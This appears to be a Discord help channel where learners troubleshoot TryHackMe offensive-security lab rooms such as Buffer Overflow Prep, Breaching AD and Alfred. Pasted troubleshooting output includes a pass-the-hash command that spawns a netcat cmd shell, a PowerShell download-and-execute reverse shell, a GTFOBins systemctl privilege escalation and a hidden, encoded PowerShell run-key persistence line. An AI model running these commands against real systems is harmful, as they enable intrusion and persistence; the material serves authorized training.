This file was generated by cloudflare-warp.
nameserver 127.0.2.2
nameserver 127.0.2.3
nameserver fd01:db8:1111::2
nameserver fd01:db8:1111::3
search home
options edns0
options trust-ad

And I modified that

.

This file was generated by cloudflare-warp.
nameserver 10.200.55.101
nameserver 10.200.55.101
nameserver fd01:db8:1111::2
nameserver fd01:db8:1111::3
search home
options edns0
options trust-ad

and nothing

nslookup thmdc.za.tryhackme.com
Server: 127.0.2.2
Address: 127.0.2.2#53

** server can't find thmdc.za.tryhackme.com: NXDOMAIN

Hello guys and ladies.
I found something strange in 'Buffer Overflow Prep' room. First task which requires to send evil buffer said that I had to find a pattern in logs but I'm not sure if the output given as example is correct.
Is there someone who knows how it should work to complete this task?

I got suspicious that distance is just for example. Thank you @fleet wedge

Gave +1 Rep to @glad kindle

Yep @fleet wedge , seems I need your help one more time.
Manual said that I need to run server on Windows machine, run exploit script and then run compare command with argument of ESP register address which I'm not sure how to get and seems it wasn't mention earlier.

Yes, I went by manual

OK, I'll do this room from beginning tomorrow

Thank you

Brainpan1 is not working I’v done 99% of pentesting, trying to finish it up. Any thoughts when they will fix it?

Staff are aware.

Hey guys,
I'm playing with the 'kenobi' box. I'm wondering why I need to change my directory to /tmp in the last step? Could anyone help me figure out? TKS!

Why do you think you ‘need’ to? You have control of the the things you need to control and you can choose how things happen. Experiment with different ways of making things happen maybe?

Or maybe think about how you’d change the commands if you wanted to not do ‘cd /tmp’, or if you wanted to use a different directory completely.

The specific commands given in the room are imho really just because they had to specify a particular sequence of commands that work, given that the room is a walkthrough. It doesn’t mean that they’re the only commands that will work.

What I learned from Kenobi room is that you almost always have rights to read and write tmp folder but it can be different in case of other folders.

Btw /dev/shm is a good place to put files too, it will only be saved to memory

/dev/sharedmemory for those wondering what /dev/shm means

Hi guys, I have a problem connecting to Breaching AD network

I had to manually change the interface name from breachad -> tunX at openvpn config file to make it work

I wonder if anyone have the same issue?

welp another one

for some people it works without changing the interface name for some reasons

I see, damn I hate implicit interface names

Try tun and not tun0

Oh it works now.

I decided to change to tun-breachad lol

trying to do a pth attack on lateral movement network and when i run sekurlsa::pth /user:t1_toby.beck /domain:za.tryhackme.com /ntlm:HASH /run:"c:\tools\nc64.exe -e cmd.exe IP PORT" it doesnt catch on nc

all parameters are correct ive double checked so thats not the problem

it was ufw 🤡

forgot to add rules on my new vm

Hi guys and ladies.
Got same question as yesterday. 'Buffer Overflow Prep' room, first task asked to modify exploit script with bad characters and note ESP register address after its run. This is debugger output from script run and I'm not sure where this address should be. @fleet wedge maybe you're here today?

I even tried approach from https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst
where payload of exploit is random payload from previous steps plus bad chars but with the same result.

Sure

Well I did first task of Buffer Overflow. Memory analysis look little bit odd for developer use to leave garbage collection to runtime environment.

Hi guys,
in room : Breaching Active Directory
If anyone have problem using burp suite with NTLM authentication, I'll share a solution

1. Setup NTLM auth credentials
2. Enable use of HTTP/1.1

I have the same problem and looking for Ans 😄

Yup... thanks.

Gave +1 Rep to @ebon mesa

Hi Everybody,
in room HackPark of the Offensive Pentesting path I do not understand how to get my meterpreter session to work...
when I launch the script to get the reverse shell I get
[*] Sending stage (175686 bytes) to 10.10.220.146
and then it is stucked there...
so it seems that both the payload and the meterpreter listener are ok... but it only prints that message and it does not go forward... any ideas?

I tried to follow the video, but I am again stucked in the same place

the buffer overflow room is annoying i did everything correct and i still cant catch a shell

Looking for help with powershell

https://www.reddit.com/r/tryhackme/comments/12rc3hy/hacking_with_powershell/

I am not sure if its the room or the ans

i found out why it didnt work lol

🤦‍♂️

Am I going mad or was the AD-Basics room changed since I last made my notes?
Was looking to take a copy of the Kerberos auth sequence diagram for my lateral movement section and cant seem to find it (despite my notes highlighting the section after Group Policies)

Ah. Right. There's a separate room outside the path (https://tryhackme.com/room/activedirectorybasics) that covers similar material but splits the auth section to another room for more detail (e.g. what silver/gold tickets refer to)

Path still uses this room https://tryhackme.com/room/winadbasics

Hey , so i have a question for "Hacking with powershell" task 2 where it asks us "What is the command to get a new object?" , the hint is to combine two verbs, ive tried the obvious answers like Get-help , or Get-functions, which seems to be the answers but it doesnt work, so is that bad formatting, or is there some input validation error from the website's end ?

The clue is in what you're being asked to do.

Use the list given to you in the task.

well, it tells me to combine two verbs, an example of which is "Get-help join" , still doesnt work

But it's asking you for something specific.

Help join isn't even on that list.

ohh , im sooo stupid, got it man 😅

really appreciate your time to respond bro

Hi, does anyone could get a root shell on the Game Zone machine?

In the last task

What payload did you use? I couldn't get it

I had to print the root.txt content into another filer to finish the machine, but it would be good to know how to get the root shell

Thanks!

Gave +1 Rep to @glad kindle

For anyone who is in Steel Mountain:

When it comes to using powershell script, make sure you do Import-Module [ps1 script name].ps1 to import the powershell script before trying to execute it after simply uploading it through meterpreter to the target machine.

For example:

Import-Module PowerUp.ps1 
``` to import the module
and 
```ps1
../PowerUp.ps1
``` to use it.

I felt Previlige Esclation i.e Task 3 skipped this part.

or maybe it was part of self research

In the end I managed 😅 I was making a stupid mistake in generating the payload

Hi guys and ladies.
Seems I found a little inaccuracy in description of Buffer Overflow Prep description. It said that to generate cyclic pattern uses Ruby script from Metasploit located on
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb
But I can't find it here instead location that works for me is
/opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb
Either it's update of Metasploit on VM or I missed script.
Can anyone from the team check it?

just use "msf-pattern_create"

Yes, it's possible to do that way. By saying 'check it' I mean description in room task.

i'm using bettercap in kali linux to track the traffic in http and https websites

it works perfect in http websites

but when it comes to https it's not even though i;m using hstshijack

my assumption is that the script called hstshijack.cap in hstshijack is at fault

can anyone help go any further

anyone

Hi, I have an issue with AttackBox, can someone give me an advice? When I open AttackBox it's look like it don't have an internet connection. Because of that I'm unable to continue in excersises and I'm stuck on that for two days. DO anyone have some advice for me<

*?

Free users don't have an external connection, are you a free user?

Yes I was. Meantime I was too disappointed about that situation and I payed a subscription and that was the problem. But thanks, I appreciate your advice 🙏🏻😁

Guys can someone tell me what is the maximum possible number of vulnerabilities you can find in Relevant box challenge ?

Hello all, I hope everyone is having a wonderful week so far. I was wondering if this is where I go to ask for help with buffer overflow? I have a few questions about finding bad chars. Thanks in advance for any help.

Hi Legends, I am thinking of which pathway I should take since I've done my jr pentester, #offensive-pentesting-path or #1129473280949112842-teaming. Can you please share your reason/thoughts. thx heaps legends😻

Hi, I passed Buffer Overflow Prep room recently and got some idea how it should work

Awesome! My question is about finding them. What's the best method? I've watched and read several walk through all using a different version of Python scripts. Kind of overwhelming.
I have a good grasp on the why and theory behind it. I just can't seem to get what exact char is "bad" ill see in the data stream the out-of-place chars but usually they're 2 or three that are odd in the pattern. Do I use just the one that started the bad set? Or all of them?

What I got that you use all of them and don't forget to update byte array by new bad chars

It won't let me upload a screenshot but say the looks like this
04030201
08070605
0C0B0A09
100F0E0D

Are you sure we're talking about same room?

Hi guys and ladies!
I just started to walk Brainstorm room and got quite strange issue here. I tried to scan open machine ports with following different scans:
nmap <IP>
nmap -p- <IP>
nmap -sS -p- <IP>
nmap -sT -p- <IP>
nmap -sU -p- <IP>
nmap -sN -p- <IP>
nmap -sF -p- <IP>
nmap -sX -p- <IP>
and got the most 3 open ports but correct answer for this room is 6 (easy to guess).
Anyone have any idea how to get 6 open ports here?

Maybe they are being filtered ?

Some of scans for example nmap -sU -p- <IP> gave me that all ports are open|filtered but other like nmap -sS -p- <IP> gave precise number of ports and it's 3 opened ||(actually it's 21,3389,9999)||

I have no idea how to start

There's a private ip address

Find which ports are missing via a walk through, try scanning 1 see if it returns open

I'm not sure which are missing 'cause I never saw more than 3 opened but it suppose to be 6. Maybe the answer in room is outdated?

I had a similar issue with Kenobi but got more ports than the corrrct answer. I got around 11, but the correct answer is || 7 ||.

Would anyone have any good reference material for building a pipboy for security testing? I've seen the prebuilds on amazon and considered just reprogramming and upgrading as necessary, but I feel building my own would teach me more. Thank you for your time.

hello

hi there

hi, i have a problem with Active directory basics: to connect with phillip account, i use remmina, and in the windows login page i need to type "THM\phillip" but the \ can't be write with remmina. So i try with xfreerdp, here i can type \ , but the "(" and the ")" in the first powershell command can't be write 😭 (i use an azerty keyboard for information)

i'm blocked

Have you tried to change the kb layout in your vm?

Or using a virtual keyboard in the vm?

Hi folks, I've been facing issues with the breaching AD room. I'm using my own machine to connect to the breachAD network. The site then asks me to change my DNS settings using the follwoing command systemd-resolve --interface breachad --set-dns $THMDCIP --set-domain za.tryhackme.com , but the kali linux throws an error systemd-resolve: command not found .

I googled about this and someone said that the systemd-resolve has been replaced by resolvectl. Can someone please help me with this!!!

Pls DM if you have an answer or atleast ping me

How do you choose from the 'Exploit Title' list?

Exploit Title | Path

Apport (Ubuntu 14.04/14.10/15.04) - Race Cond | linux/local/37088.c
Apport 2.14.1 (Ubuntu 14.04.2) - Local Privil | linux/local/36782.sh
Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - L | linux/local/40937.txt
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14. | linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16 | linux_x86/local/42276.c
Linux Kernel (Ubuntu 14.04.3) - 'perf_event_o | linux/local/39771.txt
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.0 | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.0 | linux/local/37293.txt
Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / | linux/local/41999.txt
Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'ov | linux/local/39166.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64 | linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.0 | windows_x86-64/local/47170.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/1 | linux/local/47169.c
NetKit FTP Client (Ubuntu 14.04) - Crash/Deni | linux/dos/37777.txt
Ubuntu 14.04/15.10 - User Namespace Overlayfs | linux/local/41762.txt
Ubuntu < 15.10 - PT Chown Arbitrary PTs Acces | linux/local/41760.txt
usb-creator 0.2.x (Ubuntu 12.04/14.04/14.10) | linux/local/36820.txt
WebKitGTK 2.1.2 (Ubuntu 14.04) - Heap based B | linux/local/44204.md

This should be based on your target? Or are you referring to something else perhaps?

You have to replace the $THMDCIP with the ip adress of the computer in top of the shema (it's not really clear i know)

did anyone have trouble with overflow prep, i feel like it's pretty hard to understand what actually is happening there

Hello, i have a question about the "relevant" room

Always best to just ask your question right away 🙂

ok, i found user credential so i try to connect to the machine but it didn't work ? i was pretty sure that i was on the right path

is there anyone i can dm to see if i'm in the right path ?

In buffer overflow prep, why do the tools not exist anymore? Also how come !mona findmsp -distance 600 doesn’t return an EIP value?

I got it working with offset 2100. I guess the instructions in the room are inconsistent with the actual offsets I’m finding.

Yeah never mind I didn’t read the instructions closely enough

└─$ python2 windows-exploit-suggester.py --OPTIONS
[] initiating winsploit version 3.3...
[] database file detected as xls or xlsx based on extension
[-] please install and upgrade the python-xlrd library

└─$ pip install python-xlrd
Defaulting to user installation because normal site-packages is not writeable
ERROR: Could not find a version that satisfies the requirement python-xlrd (from versions: none)
ERROR: No matching distribution found for python-xlrd

How can i solve this issue?

Have you checked the error message in Google?

hi, please is there a way one can track a mobile phone with the IMEI or even possible without it

Yes. Not much help. The script is for python 2. I ended up using winpeas.

guys I'm having a proplem in retro ctf

hello

Hey!

I have a discrepancy on the Buffer Overflow Prep room. According to the walkthrough, I'm supposed to get Corruption after 6 bytes but I get a corruption after 0 bytes. I used the same mona command and same bad bytes.

oh nevermind, you have to keep something in the return address (like "BBBB")

On Brainstorm I see 3 open ports using nmap. Where do the other ports come from?

Has someone done the Alfred Room ? I can't get the inital access

hey guys. I'm on the Relevant box. I've seen a couple of writeups, including the mayors that show a few more open ports than what i've gotten last night and tonight scanning the machine.

ok i gues i've forgotten how to upload screenshots

Anyone else having issues with the DailyBugle room? It's extremely slow and just hangs indefinitely sometimes

You need to verify your account to do so.

!docs verify

Same, i'm only getting 3 ports. I tried UDP also but it didn't find anything. All the walkthroughs show 3 ports as well but don't give any explanation as to why the answer is 6 LOL

oh yeah that is a bug

¯_(ツ)_/¯

I got the same thing.

I cannot figure out !verify idk what i'm doing wrong. I don't see what its talking about on the users list on the right hand side of the page.

on discord on desktop

hit the button that looks like 2 people

then you will get a list of alll the users on this discord

from there left click the @frank trout bot and there should be a box to enter text into

yeah and then i've entered !verify, ! verify, !docs verify. I get nothing

I'm 41 % through the offensive pentesting path and can't figure out how to verify on discord! 🤦‍♂️

I got it. thanks

haha nice you are verified now

just mark the first byte of those series of bytes as a bad byte

then try again

generally a bad byte can corrupt bytes that come after it

I do. on overflows 456. i finished 1-3 without any problem. now 456. on 6 right now. first run i get 3 bad chars, un-sequenced, next run i get a bad char that's 2 higher than the previous, ok add it and run again. get the next number in sequence. I don't add it. run it again, get the next number in sequence. i dont add it. get the next number in sequence, and so on it goes. idk. like I said, I've got the first 3 no prob. idk

following in mem dump, it looks like it says though. like from that null byte on its out of order.

Do I need to update mona in the thm machine?

Eelo there , just started enumeration AD room .... connected to ovenpvn through my Kali machine

But when I went to distributed.za..... site to get the credentials....it shows server is down

Anyone can help me with this

Did you add to the resolv.conf file?

Ummm I didn't ....

Just downloaded the ad-enumeration.conf file and did sudo openvpn Aden.......

You need the IP of the THMDC and enter it at the top of the file as

sudo nano /etc/resolv.conf

nameserver 10.200.xxx.101

Ahh

Wait you mean that ad-enumeraion.conf file right

No.

I mean /etc/resolv.conf

On it

Thankuuu, its working for mee

Hello sorry for bothering you guys, I am just wondering if anyone in here is familiar with the Networkminer? I am just working on my lab of my college... I am kinda stuck and need some helps, I really appreciate with any responses from u guys....

Hi Guys i am trying to complete this task in Exploiting Active Directory Task 3, but i m getting an error. I already followed every steps 1 by 1 but still get the same error. I want to share the screenshot but cant paste the pic in here

You need to verify your account to do so.

!docs verify

Thanks!

Gave +1 Rep to @lofty sky

hi guys i am trying the Alfred room, but i got some problem when im trying upgrate the nc revshell to meterpreter. i got everything setup but when i execute the 'powershell start-process "revshell.exe"' there is no respond. the nc powershell revshell didnt show a new prompt, no respond from meterpreter as well. here are some sceenshot

here is the setting command

Hi, I'm in AD-enumeration room, using 4.1.0 Bloodhound version, my zip file has been correctly uploaded but I still can't find any attack path from my generated AD user, any fix regarding that situation ?

I think I got it, you have to use the task file, or you will not get any result, you don't need exploiting anything in that room

Based on the information you have given, the name of your shell is revshell.exe so you should be calling Start-Process "revshell.exe" (you don't need powershell, you're already in one, also Start-Process is case sensitive)

Thank you for the solution, had the same problem!

Gave +1 Rep to @gloomy escarp

Hi

Hi, i cannot find the squid services running or installed in virtual box. But the question asking for squid proxy version??
Nmap done: 1 IP address (1 host up) scanned in 76.51 seconds
root@ip-10-10-123-212:~# nmap -sV 10.10.123.212 | grep squid
root@ip-10-10-123-212:~# systemctl status squid
Unit squid.service could not be found.
root@ip-10-10-123-212:~# sudo systemctl status squid
Unit squid.service could not be found.
root@ip-10-10-123-212:~# netstat -tuln | grep 3128
root@ip-10-10-123-212:~# sudo systemctl status squid
Unit squid.service could not be found.
root@ip-10-10-123-212:~# systemctl status squid
Unit squid.service could not be found.
root@ip-10-10-123-212:~# Any one please advice

You are scanning your own IP, that doesn't seem right. What room and task is this?

oh yaa.. i am doing nmap https://tryhackme.com/room/vulnversity# Recon

Did you start the machine with the green "Start Machine" button and allow the VM to boot then use the provided IP in your scan?

ok

thank you

got it thank you @next wren

Gave +1 Rep to @next wren

np

hi mates i am new in cyberworld does anyone have a videos content fro beginner PENTESTING

YouTube has plenty. How are you doing with this learning path?

I am at breaching AD, where I can ping the DC but not able to do nslookup

Can you check the pins in #breaching-ad

I have seen

And did you follow?

Also, nslookup can sometime be bugged.

if I do this:
nslookup thmdc.za.tryhackme.com
It show to ip but when I do this
nslookup tryhackme.com 10.200.28.101
I receive time outs

and I on printer site it show ldap server unavailable

but the ntlmauth site works fine

Did you add the THMDC to /etc/resolv.conf?

i added this
nameserver <THMDC-IP>

To the top?

Can you verify and show screenshots?

!docs verify

And can we move this to #breaching-ad

yes wait showing ss

Can you do ip a for me please.

yes

I am able to visit sites but at printer one it tells ldap server is down

like unavailable

Maybe you need to reset th enetwork

I had voted 3 people had voted

Ig it will restart on 5 votes

wait it worked

You can vote once an hour.

you can vote once an hour too

LDAP is running now?

It worked

yes

Ah, good.

I think internet issues

or something like that

From your side, possible.

yea thanks

Site is still showin ldap unavailable but i got the response on netcat

I think it was working from the start just showing unavailable

some one help me with this ""IOI_updater" REG_SZ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$sGMomKEmx=$((gp HKCU:Software\Microsoft\Windows\CurrentVersion Temp).Temp);powershell -Win Hidden -enc $sGMomKEmx""

Hello I have the following doubt can someone please clear it:
How can i login to a domain if the user do not have permission to write in shares. I had tried using psexec but it show I do not have perms

I enumerating AD they have show a runas binary in windows but how to do this in linux

remmina and using rdp

Rdp is not available

I think i need to use windows there nothing in linux ig

What is the error here

hmmm dunno

could be that it is not wanting to have the domain specification in the username

What should I do

remove the domain in username?

First time I logged in performed the taks changed the password of Teir2 admin after that I am not able to login in any account with correct paas😢

yeah shadow would try that.... another option would be to try and use remmina for your rdp client as that tends to be easier to use then xfreerdp

okay Let me try it

Nope didn't worked

I think resetting network is the last option

Room: Persisting AD

I googled this error but not able to solve it

For vulnversity "compromise the webserver" I couldn't get the php reverse shell to open a connection to my Kali VM which has an internet connection/vpn to THM because I used it for several modules and rooms, and I'm using my THM VPN IP in the reverse-shell script I got by going to 10.10.10.10 on my Kali browser while my VPN is active.

I know I'm doing it right because it worked instantly when I did it from the attack box. Is there something on my network I should look for that's blocking it? Nothing showed up in my router logs. Or could it be a VM issue that even though my VM can connect out it's blocking a connection into it?

Also, what's the best way to use Kali and the VPN to connect to machines? It gets tedious using a VM because I can't copy stuff out of it into the THM browser for flags and such.

If you use virtualbox, you need to install guest additions to copy/paste.

I'm using Hyper-V. I created an external switch so it can reach out to the internet, which it can. I have this on my list of things to figure out, but I finished the room so I'll mess with it another time. I'm considering just booting Kali from a USB on an older laptop I have and using that to connect to THM

I'll just update that the problem was user error. It had to have been that I wasn't using the VPN (tun0) IP in either the payload or when listening for the incoming connection, and was using the private IP of my VM instead.

Hi gys

hi, I'm trying to work through Alfred and was planning on using RogueWinRM to do the impersonation. I went to https://github.com/antonioCoco/RogueWinRM to grab RogueWinRM, but I have no idea what to do with these files? How do I turn them into the RogueWinRM.exe?

I tied using GCC but the compiler just throws errors

Go the releases page and download the .zip file, it will have the exe within it https://github.com/antonioCoco/RogueWinRM/releases

ty

do you know if there is a way to get an x86 version? Apparently the system does not support the x64 version even though it says it is an x64 system

Room: Persisting Active Directory
In task "Persistence through GPOs" I cannot add a new GPO. I get Error "Network acceess denied" when try to do it. I also wait for reseting all the network and try again, but still no success.

(I run mmc with admin prompt after using "runas /netonly /user:thmchilddc.tryhackme.loc\Administrator cmd.exe")

I might need a bit of help. In the Advanced Exploitation module, Steel Mountain, Task 2, "Take a look at the other web server. What file server is running?" I tried for an hour, but I cannot seem to get to the correct answer. Anyone available to help out/give a hint?

nmap?

Or.. visit?

Of course I ran nmap 🙂

And did you visit the web server?

Nothing coresponds with the number of letters (***..)

It does. 😄

You need to get the name from two places.

Still dont see it. Also not on the page at port 8080

I feel stupid and am baning my head against the wall. 😕

You got an ip?

Yeah

Can I have it?

Ill share in a DM ok?

No, you can post it in here.

Ok. Sorry for the DM. 10.10.36.3

I tried "||Windows 2008 NTFS Server||" as last.

I'm scanning your ip.

Mine or the instance?

:p

the instance.

I wouldn't risk my Community Mentor status like that.

I was just kidding.

The answer is linked in here 😉

Of course I looked there and on the rejetto page. But I cannot find a 7-letter word anywhere.

You're so close...

||rejetto is PART of the answer.||

It's along the same lines as ||python http file server|| 😉

Nooooooo. Pffff hahaha. Thx for the hint. I really felt stupid, whilst I am a long member.

Gave +1 Rep to @finite pivot

Thanks @finite pivot . I finally can move on. I could already maybe, but I like to do things chronologically.

Yeah, I can understand that.

Room: HackPark, I had other ppl follow along with me and their connection came through with clear text mine is only giving gibberish, what am I doing wrong here?

What exact payload did you use? And why is it showing that the connection came from your own machine?

I worked on HackPark, but I'm still in the privesc portion. Did not encounter that though. Can you share a screen capture of the file you uploaded in the vulnerable application and what filename did you save it as?

Also, did this just happen on HackPark only and not on other boxes?

hi it was resolved, the issue was my VM had not had a vpn refresh since the prior night

hi I have a new problem I am having trouble with, I am on Vulnversity and on the final section of privesc it refers to GTFObins, I am stuck there, as I believe there is parts of the exploit that I do not need put into the shell I have on the machine, I do not understand what it means by TF, I may just be out of it as it is very late but I still wanted to ask:

To my understanding TF is only a variable. Let's wait for others to chime in as to how they understood it.

Ill look to see if I am any help, one sec

Please link the gtfobins you are using so I can read more

but it looks to just be a var

https://gtfobins.github.io/gtfobins/systemctl/?ref=blog.tryhackme.com#suid

First Command: sudo install -m =xs $(which systemctl) .

sudo install -m =xs $(which systemctl) .

• -m =xs: This sets the mode (permissions) of the file being installed. =xs is not standard syntax for the chmod or install commands. Normally, x would set the execute bit, and s would set the setuid bit. However, the = operator is used incorrectly. The correct syntax should be something like -m a=xs or -m 4755.

• $(which systemctl): This is a command substitution that runs which systemctl and replaces the $(which systemctl) part of the command with the full path to the systemctl executable.

• .: This is the destination of the install command, referring to the current directory.

Second Command: Creating a Temporary Service File

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF

• TF=$(mktemp).service: This command creates a temporary file with the .service suffix and stores the file path in the variable TF.

• echo ... > $TF: This echoes a new service file configuration into the $TF file. This configuration includes:

  • [Service]: The start of the service section.
  • Type=oneshot: Specifies that the service is run only once and is not persistent.
  • ExecStart=/bin/sh -c "id > /tmp/output": The command that the service will run once started. It will execute id (a command that prints user and group information) and redirect the output to a file named /tmp/output.
  • [Install]: Begins the section that describes how the service should be installed.
  • WantedBy=multi-user.target: This line specifies that the service should be started when the system reaches the multi-user runlevel (a state where multiple users can access the system and network services are up).

Third and Fourth Commands: Linking and Enabling the Service

./systemctl link $TF
./systemctl enable --now $TF

• ./systemctl link $TF: This command is meant to create a symlink for the service file in the system's systemd directory, telling systemd where to find the service file. However, it is normally systemctl without ./, unless the intent is to use a modified or local copy, which could be inferred from the previous misuse of install.

• ./systemctl enable --now $TF: This command tells systemctl to enable the service, which makes it start at boot, and --now tells it to start the service immediately.

I used ChatGPT to break it down, I would add ChatGPT to your tool kit

ChatGPT told me something similar but there is still parts I didnt understand, thank you for taking the time to answer this question for me

Have to make sure to instruct chat to do exactly what you want.

Hi, folks
Are any of the boxes in this mod down or is anyone else having issues accessing any of them?
I'm specifically having trouble with SkyNet and GameZone. I also tested HackPark but didn't have an issue with that

seems I can't connect to DailyBugle either. Just HackPark via browser

hi about active directory basics

i am getting error trying to run command to change sophie's pass as phillip, like phillip does not have sufficient privs

am i missing sth?

I am getting error "access is Denied"

what command are you running?

What have you tried to connect to the target VMs attached to those rooms?

I use openvpn as I always have, and I've done these rooms before; I've reset the VPN connection, restarted my network manager, restarted my VM. I can ping them, can't access them on the browser though; except HackPark, that's browser accessible out of the 4 I've tested

I haven't worked on Daily Bugle and GameZone yet, but I'll try to connect to those when I get a chance.

Before I put too much more effort into it I wanted to make sure that the boxes were actually up, so I came here. I can ping them so I guess they are. but I can't get them through the browser for anything I do, I've reset everything and tried multiple times

yea, thanks. Just knowing if anyone else is having the problem or not would be good

Gave +1 Rep to @lofty sky

hi! i am trying to run the command as given in the example : Set-ADAccountPassword sophie -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose

nvm i had to delegate control first...

Thanks a lot!

Gave +1 Rep to @keen iris

is anyone facing this problem with Alfred room where Invoke-PowerShellTcp.ps1 is to be run to gain remote shell.
I am facing this problem

Started by user admin
Running as SYSTEM
Building in workspace C:\Program Files (x86)\Jenkins\workspace\project
[project] $ cmd /c call C:\Users\bruce\AppData\Local\Temp\jenkins1263082392557087775.bat

C:\Program Files (x86)\Jenkins\workspace\project>powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.247.221:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.247.221 -Port 4444 
Invoke-Expression : Unexpected token ':' in expression or statement.
At line:1 char:4
+ iex <<<<  (New-Object Net.WebClient).DownloadString('http://10.10.247.221:800
0/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.247
.221 -Port 4444
    + CategoryInfo          : ParserError: (::String) [Invoke-Expression], Par 
   seException
    + FullyQualifiedErrorId : UnexpectedToken,Microsoft.PowerShell.Commands.In 
   vokeExpressionCommand
 
The term 'Invoke-PowerShellTcp' is not recognized as the name of a cmdlet, func
tion, script file, or operable program. Check the spelling of the name, or if a
 path was included, verify that the path is correct and try again.
At line:1 char:121
+ iex (New-Object Net.WebClient).DownloadString('http://10.10.247.221:8000/Invo
ke-PowerShellTcp.ps1');Invoke-PowerShellTcp <<<<  -Reverse -IPAddress 10.10.247
.221 -Port 4444
    + CategoryInfo          : ObjectNotFound: (Invoke-PowerShellTcp:String) [] 
   , CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
 

C:\Program Files (x86)\Jenkins\workspace\project>exit 1 
Build step 'Execute Windows batch command' marked build as failure
Finished: FAILURE

I am using this in window batch command option in configure tab of project. Could someone help me. I've tried restarting the machine but still it doesn't work.

From what I can understand it doesn't find the ps1 file on your local webserver. Make sure the file is located in the folder where you started your webserver. Say if you started the web server in /tmp/, the ps1 file should be there

can someone please tell me if there is a ready-to-use windows machine to work on Task #2 from https://tryhackme.com/room/adenumeration ?

There isn't, you need to use the attackbox or VM and RDP in, if you need to.

how will RDP help if I have no windows machine to connect to?

Because the machines booted up are windows.

You'll be given credentials

@finite pivot can you please explain to me how I can connect to one of those machines step by step? I have the credentials to connect via ssh

The room shows you to? I think

I guess no, that's exactly my problem

Q for red teamers : would u prefer using openvpn as a tunnel between your local c2 and a redirector (hosting on cloud) or using nebula 😉

Does anyone have an example of using Incognito to abuse the SeImpersonatePrivelege that does NOT involve using Metasploit? I can't seem to find anything - every time there is mention of Incognito it is done through Meterpreter

Use potato family instead

hi guys, i need help

Something went wrong. Your change may not have been saved. Please try again. There is also a chance that you may need to manually fix and upload the file over FTP.

this error is giving when trying to save the reverse shell in the php file in the wordpress panel

.

Can someone help me?

Are you already an admin equivalent user in wordpress? Also, what room or box are you working on?

yes, I logged in as admin.
I'm at Offensive Pentesting > Advanced Exploitation > Internal

Oh.. Internal.. haven't done this box yet. Have you tried to do it in other pages?

Yes, I tried, but it did the same thing.

I'm try again

If there is anyone who has already done this room and can help me... I would appreciate it!

but thanks for trying to help me!

Gave +1 Rep to @lofty sky

I'll try to take a stab at it tomorrow (after the AoC task) as I'm already curious.

ok, if you can tell me!

I managed it, but only on atackBox, on my kali linux with the vpn it was not possible.

im stuck at Game Zone room

Im unable to do reverse ssh tunneling in task 5

Im using the command as specified

but it is not working for me

Can anyone help

Which part were you stuck at? I'm working on internal and am stuck after getting the SSH tunnel set up and accessing the Jenkins page. When I try to connect to localhost it says connection refused

As in I can't access the 127.0.0.1:8080 because it says connection refused

Hi I am now at this path I'm preparing for CompTIA Pentest+ certificate and I want some recommendations do I need to finish this path first or jump to CompTIA path?

I would say just jump into the Pentest+ path

Then return to Offensive path ?

Offensive path is more difficult then the Pentest+ one imo and the knowledge in it would be overkill for the exam. It is good learning to do after the fact, but I wouldn't feel like you need to go through before getting the certification.

Can you please show me the roadmap all TryHackme paths ?

#general message

👍

@pearl bronze

got

hi
this what a command mentioned in task 1 xfreerdp /u:admin /p:password /cert:ignore /v:<ip> /workarea
but connection getting error

did you put the IP in?

yes

are you connected to the vpn?

yes

what OS are you on

kali linux

what is the error saying?

can you copy and paste it into chat?

─(kali㉿kali)-[~]
└─$ xfreerdp /u:admin /p:password /cert:ignore /v:10.10.57.12 /workarea
[10:10:58:996] [81332:81333] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[10:10:58:999] [81332:81333] [ERROR][com.freerdp.core] - failed to connect to 10.10.57.12

what does ip a say?

are you actually connected to the vpn?

if so

try another server

or regenerating your vpn file

im unable to get the ssh tunnel working even after following the instructions. Im unable to access localhost:10000 in my system

in my terminal im getting the error: channel 3: open failed: administratively prohibited: open failed

I saw many videos and consulted write-ups, nowhere this problem is encountered after following instructions

-unmute 990979975786168361

🔊 Unmuted vision0870

I worked out that I made a mistake with the IP address when trying to connect. The command is ssh -L 1234:[IP from the .txt file]:8080 aubreanna@[IP of the original target machine]

I can't remember the IP from the text file off the top of my head so lets pretend its 174.56.0.2 (this is the site that can only be accessed "internally"). So the tunnel command is: ssh -L 1234:174.56.0.2:8080 aubreanna@10.10.64.92 with 10.10.64.92 being the IP of the original target machine (the one THM gives you when you start it up)

In the Breaching AD room in Task 3 (NTLM Authenticated Services) we are given the python script to attack the authentication page. For the sake of the learning experience I was trying to also use Hydra against it but can't figure out how to do it? Anyone able to help?

Hey,

I'm kinda stuck in this room, I know how I can manage to do it, but I need some help to explain what is wrong with my steps in Steel Mountain room.

Can someone help me pls ?

In what specific step are you currently stuck?

The part without Metasploit

I passed it because I know the command but the python2 code wasn't working

And the Part with metasploit, the weak permission vulnerability gave me a hard time LOL. I had to use the exact sc command with specific arguments

